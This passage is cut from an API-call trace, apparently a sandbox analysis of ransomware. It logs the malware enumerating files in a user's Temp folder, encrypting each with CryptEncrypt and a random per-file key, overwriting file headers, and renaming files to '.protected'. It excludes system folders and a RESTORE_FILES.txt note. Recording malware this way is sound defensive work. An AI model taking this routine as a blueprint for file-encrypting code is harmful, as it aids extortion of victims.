lpOverlapped=0x0) returned 1 [0086.797] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, 
lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0086.797] CloseHandle (hObject=0xd8) returned 1 [0086.798] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\GoxtxhkLQv.m4a.protected") returned 77 [0086.798] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\GoxtxhkLQv.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\goxtxhklqv.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\GoxtxhkLQv.m4a.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\goxtxhklqv.m4a.protected")) returned 1 [0086.799] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0086.799] lstrcmpiW (lpString1="GVS3vvSLcwTIm2-0.mp3", lpString2="Windows") returned -1 [0086.799] lstrcmpiW (lpString1="GVS3vvSLcwTIm2-0.mp3", lpString2="Program Files") returned -1 [0086.799] lstrcmpiW (lpString1="GVS3vvSLcwTIm2-0.mp3", lpString2="Program Files (x86)") returned -1 [0086.799] lstrcmpiW (lpString1="GVS3vvSLcwTIm2-0.mp3", lpString2="$Recycle.bin") returned 1 [0086.799] lstrcmpiW (lpString1="GVS3vvSLcwTIm2-0.mp3", lpString2="System Volume Information") returned -1 [0086.799] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\GVS3vvSLcwTIm2-0.mp3") returned 73 [0086.799] StrStrIW (lpFirst="GVS3vvSLcwTIm2-0.mp3", lpSrch=".protected") returned 0x0 [0086.799] lstrcmpW (lpString1="GVS3vvSLcwTIm2-0.mp3", lpString2="RESTORE_FILES.txt") returned -1 [0086.799] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0086.799] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, 
pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0086.799] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\GVS3vvSLcwTIm2-0.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\gvs3vvslcwtim2-0.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0086.799] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\GVS3vvSLcwTIm2-0.mp3") returned 73 [0086.799] StrStrW (lpFirst="GVS3vvSLcwTIm2-0.mp3", lpSrch=".txt") returned 0x0 [0086.799] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\GVS3vvSLcwTIm2-0.mp3") returned 73 [0086.799] StrStrW (lpFirst="GVS3vvSLcwTIm2-0.mp3", lpSrch=".rar") returned 0x0 [0086.799] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\GVS3vvSLcwTIm2-0.mp3") returned 73 [0086.800] StrStrW (lpFirst="GVS3vvSLcwTIm2-0.mp3", lpSrch=".zip") returned 0x0 [0086.800] ReadFile (in: hFile=0xd8, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0086.801] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.801] WriteFile (in: hFile=0xd8, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0086.802] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.802] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, 
lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0086.802] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0086.802] CloseHandle (hObject=0xd8) returned 1 [0086.803] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\GVS3vvSLcwTIm2-0.mp3.protected") returned 83 [0086.803] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\GVS3vvSLcwTIm2-0.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\gvs3vvslcwtim2-0.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\GVS3vvSLcwTIm2-0.mp3.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\gvs3vvslcwtim2-0.mp3.protected")) returned 1 [0086.804] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0086.804] lstrcmpiW (lpString1="gY45.wav", lpString2="Windows") returned -1 [0086.804] lstrcmpiW (lpString1="gY45.wav", lpString2="Program Files") returned -1 [0086.804] lstrcmpiW (lpString1="gY45.wav", lpString2="Program Files (x86)") returned -1 [0086.804] lstrcmpiW (lpString1="gY45.wav", lpString2="$Recycle.bin") returned 1 [0086.804] lstrcmpiW (lpString1="gY45.wav", lpString2="System Volume Information") returned -1 [0086.804] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\gY45.wav") returned 61 [0086.804] StrStrIW (lpFirst="gY45.wav", lpSrch=".protected") returned 0x0 [0086.804] lstrcmpW (lpString1="gY45.wav", lpString2="RESTORE_FILES.txt") returned -1 [0086.804] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | 
out: pbBuffer=0x295ec4c) returned 1 [0086.804] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0086.804] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\gY45.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\gy45.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0086.805] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\gY45.wav") returned 61 [0086.805] StrStrW (lpFirst="gY45.wav", lpSrch=".txt") returned 0x0 [0086.805] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\gY45.wav") returned 61 [0086.805] StrStrW (lpFirst="gY45.wav", lpSrch=".rar") returned 0x0 [0086.805] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\gY45.wav") returned 61 [0086.805] StrStrW (lpFirst="gY45.wav", lpSrch=".zip") returned 0x0 [0086.805] ReadFile (in: hFile=0xd8, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0086.806] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.806] WriteFile (in: hFile=0xd8, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0086.807] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.807] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, 
lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0086.807] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0086.807] CloseHandle (hObject=0xd8) returned 1 [0086.807] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\gY45.wav.protected") returned 71 [0086.807] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\gY45.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\gy45.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\gY45.wav.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\gy45.wav.protected")) returned 1 [0086.809] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0086.809] lstrcmpiW (lpString1="History", lpString2="Windows") returned -1 [0086.809] lstrcmpiW (lpString1="History", lpString2="Program Files") returned -1 [0086.809] lstrcmpiW (lpString1="History", lpString2="Program Files (x86)") returned -1 [0086.809] lstrcmpiW (lpString1="History", lpString2="$Recycle.bin") returned 1 [0086.809] lstrcmpiW (lpString1="History", lpString2="System Volume Information") returned -1 [0086.809] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\History") returned 60 [0086.809] lstrcmpW (lpString1="History", lpString2=".") returned 1 [0086.809] lstrcmpW (lpString1="History", lpString2="..") returned 1 [0086.809] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Temp\\History\\*") returned 62 [0086.809] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\History\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0086.810] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.810] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0086.810] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0086.810] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.810] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.810] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\History\\.") returned 62 [0086.810] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.810] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0086.810] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0086.810] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0086.810] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0086.810] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\History\\." 
(normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\history\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0086.810] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0086.810] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.811] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0086.811] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0086.811] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.811] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.811] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\History\\..") returned 63 [0086.811] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.811] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.811] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0086.811] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0086.811] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0086.811] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0086.811] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\History\\.." 
(normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0086.811] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0086.811] lstrcmpiW (lpString1="History.IE5", lpString2="Windows") returned -1 [0086.811] lstrcmpiW (lpString1="History.IE5", lpString2="Program Files") returned -1 [0086.811] lstrcmpiW (lpString1="History.IE5", lpString2="Program Files (x86)") returned -1 [0086.811] lstrcmpiW (lpString1="History.IE5", lpString2="$Recycle.bin") returned 1 [0086.811] lstrcmpiW (lpString1="History.IE5", lpString2="System Volume Information") returned -1 [0086.811] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\History\\History.IE5") returned 72 [0086.811] lstrcmpW (lpString1="History.IE5", lpString2=".") returned 1 [0086.811] lstrcmpW (lpString1="History.IE5", lpString2="..") returned 1 [0086.811] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\History\\History.IE5\\*") returned 74 [0086.811] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\History\\History.IE5\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0086.812] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.812] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0086.812] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0086.812] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.812] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.812] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: 
pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\History\\History.IE5\\.") returned 74 [0086.812] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.812] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0086.812] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0086.812] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0086.812] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0086.812] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\History\\History.IE5\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\history\\history.ie5\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0086.812] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0086.812] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.812] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0086.812] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0086.812] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.812] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.812] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\History\\History.IE5\\..") returned 75 [0086.812] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.812] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.812] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0086.812] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned 
-1 [0086.812] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0086.812] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0086.813] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\History\\History.IE5\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\history"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0086.813] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0086.813] lstrcmpiW (lpString1="desktop.ini", lpString2="Windows") returned -1 [0086.813] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files") returned -1 [0086.813] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files (x86)") returned -1 [0086.813] lstrcmpiW (lpString1="desktop.ini", lpString2="$Recycle.bin") returned 1 [0086.813] lstrcmpiW (lpString1="desktop.ini", lpString2="System Volume Information") returned -1 [0086.813] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\History\\History.IE5\\desktop.ini") returned 84 [0086.813] StrStrIW (lpFirst="desktop.ini", lpSrch=".protected") returned 0x0 [0086.813] lstrcmpW (lpString1="desktop.ini", lpString2="RESTORE_FILES.txt") returned -1 [0086.813] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0086.813] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0086.813] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Temp\\History\\History.IE5\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\history\\history.ie5\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0086.814] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\History\\History.IE5\\desktop.ini") returned 84 [0086.814] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0086.814] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\History\\History.IE5\\desktop.ini") returned 84 [0086.814] StrStrW (lpFirst="desktop.ini", lpSrch=".rar") returned 0x0 [0086.814] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\History\\History.IE5\\desktop.ini") returned 84 [0086.814] StrStrW (lpFirst="desktop.ini", lpSrch=".zip") returned 0x0 [0086.814] ReadFile (in: hFile=0x150, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e7b4*=0x91, lpOverlapped=0x0) returned 1 [0086.815] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffff6f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.815] WriteFile (in: hFile=0x150, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x91, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e7b4*=0x91, lpOverlapped=0x0) returned 1 [0086.815] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.815] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0086.815] WriteFile 
(in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0086.815] CloseHandle (hObject=0x150) returned 1 [0086.816] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\History\\History.IE5\\desktop.ini.protected") returned 94 [0086.816] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\History\\History.IE5\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\history\\history.ie5\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\History\\History.IE5\\desktop.ini.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\history\\history.ie5\\desktop.ini.protected")) returned 1 [0086.817] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0086.817] lstrcmpiW (lpString1="index.dat", lpString2="Windows") returned -1 [0086.817] lstrcmpiW (lpString1="index.dat", lpString2="Program Files") returned -1 [0086.817] lstrcmpiW (lpString1="index.dat", lpString2="Program Files (x86)") returned -1 [0086.817] lstrcmpiW (lpString1="index.dat", lpString2="$Recycle.bin") returned 1 [0086.817] lstrcmpiW (lpString1="index.dat", lpString2="System Volume Information") returned -1 [0086.817] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\History\\History.IE5\\index.dat") returned 82 [0086.817] StrStrIW (lpFirst="index.dat", lpSrch=".protected") returned 0x0 [0086.817] lstrcmpW (lpString1="index.dat", lpString2="RESTORE_FILES.txt") returned -1 [0086.817] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 
[0086.817] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0086.817] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\history\\history.ie5\\index.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0086.818] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\History\\History.IE5\\index.dat") returned 82 [0086.818] StrStrW (lpFirst="index.dat", lpSrch=".txt") returned 0x0 [0086.818] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\History\\History.IE5\\index.dat") returned 82 [0086.818] StrStrW (lpFirst="index.dat", lpSrch=".rar") returned 0x0 [0086.818] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\History\\History.IE5\\index.dat") returned 82 [0086.818] StrStrW (lpFirst="index.dat", lpSrch=".zip") returned 0x0 [0086.818] ReadFile (in: hFile=0x150, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0086.820] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 